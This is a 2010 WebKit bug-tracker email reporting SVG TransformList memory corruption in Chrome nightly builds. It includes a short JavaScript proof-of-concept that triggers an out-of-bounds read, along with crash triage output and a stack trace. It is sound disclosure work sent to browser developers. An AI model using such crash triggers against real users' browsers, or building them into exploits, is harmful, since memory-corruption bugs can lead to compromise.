[Webkit-unassigned] [Bug 49619] New: SVG Transformlist memory corruption

bugzilla-daemon at webkit.org bugzilla-daemon at webkit.org
Tue Nov 16 13:20:58 PST 2010 

https://bugs.webkit.org/show_bug.cgi?id=49619

           Summary: SVG Transformlist memory corruption
           Product: WebKit
           Version: 528+ (Nightly build)
          Platform: PC
               URL: http://code.google.com/p/chromium/issues/detail?id=633
                    80
        OS/Version: Windows Vista
            Status: NEW
          Severity: Normal
          Priority: P1
         Component: SVG
        AssignedTo: webkit-unassigned at lists.webkit.org
        ReportedBy: skylined at chromium.org
                CC: eric at webkit.org, zimmermann at kde.org,
                    mdelaney at apple.com


Created an attachment (id=74031)
 --> (https://bugs.webkit.org/attachment.cgi?id=74031&action=review)
Repro

Does not appear to affect current stable, probably related to recent code changes in SVG. Attached repro requires running Chrome with --js-flags="--expose-gc"
Repro:
<script>
  var oSvgRectElement = document.createElementNS("http://www.w3.org/2000/svg","rect");
  oSvgRectElement.transform.c;
  oSvgRectElement.requiredFeatures.clear();
  gc();
  var oSVGTransForm1 = oSvgRectElement.transform.baseVal.getItem(0);
  var oSVGPatternElement = document.createElementNS("http://www.w3.org/2000/svg", "pattern");
  var oSvgTransformList = oSVGPatternElement.patternTransform.baseVal;
  oSvgTransformList.consolidate();
  oSvgTransformList.appendItem(oSVGTransForm1);
  oSvgTransformList.initialize(oSVGTransForm1);
</script>
id:             chrome.dll!WTF::VectorMover<...>::move ReadAV at Arbitrary (7ba9b70f1d27059ffca122caee553043)
description:    Security: Attempt to read from unallocated arbitrary memory @ 0x05C04000 in chrome.dll!WTF::VectorMover<...>::move
note:           Based on this information, this is expected to be a security issue!
stack:          chrome.dll!WTF::VectorMover<...>::move
                chrome.dll!WTF::VectorMover<...>::moveOverlapping
                chrome.dll!WebCore::SVGListPropertyTearOff<...>::removeItemFromList
                chrome.dll!WebCore::SVGAnimatedListPropertyTearOff<...>::removeItemFromList
                chrome.dll!WebCore::SVGListPropertyTearOff<...>::processIncomingListItemWrapper
                chrome.dll!WebCore::SVGListProperty<...>::initializeValuesAndWrappers
                chrome.dll!WebCore::SVGListPropertyTearOff<...>::initialize
                chrome.dll!WebCore::SVGTransformListInternal::initializeCallback
                chrome.dll!v8::internal::HandleApiCallHelper<...>
                chrome.dll!v8::internal::Builtin_HandleApiCall
                chrome.dll!v8::internal::Invoke
                chrome.dll!v8::internal::Execution::Call
                ...

-- 
Configure bugmail: https://bugs.webkit.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.

More information about the webkit-unassigned mailing list